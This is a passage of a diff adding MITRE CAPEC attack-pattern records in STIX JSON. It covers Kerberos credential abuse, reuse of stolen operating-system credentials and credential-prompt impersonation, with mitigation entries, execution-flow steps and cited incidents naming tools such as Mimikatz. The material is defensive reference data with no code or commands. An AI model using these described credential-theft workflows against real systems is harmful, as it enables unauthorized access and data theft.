"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.", + "id": "course-of-action--99574627-4dd1-42b3-8b6b-775ff7f38e6a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cba47b13-b50e-4cb8-8e76-8a25e15c68cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99574627-4dd1-42b3-8b6b-775ff7f38e6a", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, physically disable the microphone on your machine if it is not needed.", + "id": "course-of-action--69dcf49f-4e67-4936-8ee7-6328a342fcf3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9fead0ee-041f-4282-bc32-392a7b3aed13", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69dcf49f-4e67-4936-8ee7-6328a342fcf3", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.", + "external_references": [ + { + "external_id": "CAPEC-652", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/652.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "description": "Steal or Forge Kerberos Tickets", + "external_id": "T1558", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1558" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + }, + { + "description": "Kerberoasting Without Mimikatz, 2016--11---01", + "external_id": "REF-585", + "source_name": "reference_from_CAPEC", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "description": "Invoke-Kerberoast", + "external_id": "REF-586", + "source_name": "reference_from_CAPEC", + "url": "https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + } + ], + "id": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Kerberos Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]", + "PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Kerberos credentials: The adversary must obtain known Kerberos credentials in order to access the target system, application, or service within the domain.

    2. Techniques
    An adversary purchases breached Kerberos service account username/password combinations or leaked hashed passwords from the dark web.
    An adversary guesses the credentials to a weak Kerberos service account.
    An adversary conducts a sniffing attack to steal Kerberos tickets as they are transmitted.
    An adversary conducts a Kerberoasting attack.

Experiment

  1. Attempt Kerberos authentication: Try each Kerberos credential against various resources within the domain until the target grants access.

    2. Techniques
    Manually or automatically enter each Kerberos service account credential through the target's interface.
    Attempt a Pass the Ticket attack.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n Kerberos is the default authentication method for Windows domains and is also used across many operating systems. Attacks leveraging trusted Kerberos credentials can result in numerous consequences, depending on what Kerberos credential is stolen. For example, Kerberos service accounts are typically used to run services or scheduled tasks pertaining to authentication. However, these credentials are often weak and never expire, in addition to possessing local or domain administrator privileges. If an adversary is able to acquire these credentials, it could result in lateral movement within the domain or access to any resources the service account is privileged to access, among other things. Ultimately, successful spoofing and impersonation of trusted Kerberos credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f" + ], + "x_capec_prerequisites": [ + "The system/application leverages Kerberos authentication.", + "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication for Kerberos service accounts.", + "The system/application does not have a sound password policy that is being enforced for Kerberos service accounts.", + "The system/application does not implement an effective password throttling mechanism for authenticating to Kerberos service accounts.", + "The targeted network allows for network sniffing attacks to succeed." + ], + "x_capec_resources_required": [ + "A valid Kerberos ticket or a known Kerberos service account credential." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Kerberos credential, leveraging it is trivial." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Create a strong password policy and ensure that your system enforces this policy for Kerberos service accounts.", + "id": "course-of-action--2e1a5831-7cf6-44e4-93ce-a94cbf2d8eeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f1be939-d853-4d8a-95f3-0b617e01e652", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e1a5831-7cf6-44e4-93ce-a94cbf2d8eeb", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure Kerberos service accounts are not reusing username/password combinations for multiple systems, applications, or services.", + "id": "course-of-action--9ee558c8-a72f-4895-8174-1bade0ff03ec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a90ffcb8-0f80-4e85-8b26-10496f6bb52a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ee558c8-a72f-4895-8174-1bade0ff03ec", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse Kerberos service account credentials across systems.", + "id": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--785c37de-0ec5-4060-874b-ee39ba235750", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deny remote use of Kerberos service account credentials to log into domain systems.", + "id": "course-of-action--91219be7-37d8-46e3-935e-5f41a4522558", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d34114ce-f6a3-4ab9-ba44-4d82771bf60f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91219be7-37d8-46e3-935e-5f41a4522558", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow Kerberos service accounts to be a local administrator on more than one system.", + "id": "course-of-action--6c5c6b07-f048-4361-81c5-74776f2b1677", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4ad929d-f0f1-40d2-b370-48856e8046d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c5c6b07-f048-4361-81c5-74776f2b1677", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enable at least AES Kerberos encryption for tickets.", + "id": "course-of-action--dd7827a3-05d8-4f6b-a821-c18bae857754", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8864ef8-634a-4587-9b9f-7dffc85bb827", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd7827a3-05d8-4f6b-a821-c18bae857754", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6950a75-d731-468c-a735-bd8659dd2c6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.", + "external_references": [ + { + "external_id": "CAPEC-653", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/653.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Jeff Warren, How Attackers are Stealing Your Credentials with Mimikatz, 2017--07---11, STEALTHbits Technologies, Inc.", + "external_id": "REF-576", + "source_name": "reference_from_CAPEC", + "url": "https://blog.stealthbits.com/how-attackers-are-stealing-your-credentials-with-mimikatz/" + } + ], + "id": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Operating System Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. [REF-576]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known operating system credentials: The adversary must obtain known operating system credentials in order to access the target system, application, or service within the domain.

    2. Techniques
    An adversary purchases breached operating system username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal operating system credentials as they are transmitted.
    An adversary gains access to a system/files and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

Experiment

  1. Attempt authentication: Try each operating system credential against various systems, applications, and services within the domain until the target grants access.

    2. Techniques
    Manually or automatically enter each credential through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the network

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the network. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within system files or application configuration.

", + "x_capec_extended_description": "\n This attack can be extremely harmful when the operating system credentials used are for a root or admin user. Once an adversary gains access using credentials with elevated privileges, they are free to alter important system files which can effect other users who may use the system or other users on the system's network.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_prerequisites": [ + "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A list of known credentials for the targeted domain.", + "A custom script that leverages a credential list to launch an attack." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known credential, leveraging it is trivial." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the network.", + "id": "course-of-action--32cdaaf1-c6c9-4f68-b16f-430164c55bc6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-653-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--afbf45fe-6bad-41af-a683-b7cf50fbf513", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32cdaaf1-c6c9-4f68-b16f-430164c55bc6", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--30fc8e66-ac77-4700-963e-64a29973924f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a406676c-8452-46d2-a72c-11463c53b3cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32a275d9-4766-40b2-ae6b-7307d384bf7b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f52fb187-a070-476a-914d-5c9f061558d1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c81c0b14-89ac-4328-87fc-e5471e7edfc7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--37212961-3d05-427a-ada9-72ac4ca5adca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates a credential prompt in an attempt to steal a user's credentials.", + "external_references": [ + { + "external_id": "CAPEC-654", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Input Capture", + "external_id": "T1056", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056" + }, + { + "description": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt", + "external_id": "T1548.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548/004" + } + ], + "id": "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Prompt Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1995c522-a25d-46e4-b024-65172771a692" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary randomly prompts a user to enter their system credentials, tricking the user into believing that a background process requires the credentials to function. The adversary can then use these gleaned credentials to execute additional attacks or obtain data." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing their credentials.

    2. Techniques
    Determine what tasks prompt a user for their credentials.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials.

    2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
", + "x_capec_extended_description": "\n The adversary may monitor the task list maintained by the operating system and wait for a specific legitimate credential prompt to become active. Once the prompt is detected, the adversary launches a new credential prompt in the foreground that mimics the user interface of the legitimate credential prompt. At this point, the user thinks that they are interacting with the legitimate credential prompt, but instead they are interacting with the malicious credential prompt.\n A second approach involves the adversary impersonating an unexpected credential prompt, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process or commonly used application (e.g., email reader) requires authentication for some purpose. The user, believing they are interacting with a legitimate credential prompt, enters their credentials which the adversary then leverages for nefarious purposes. The ultimate goal of this attack is to obtain sensitive information (e.g., credentials) from the user.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate credential prompt." + ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a credential prompt is not difficult." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + 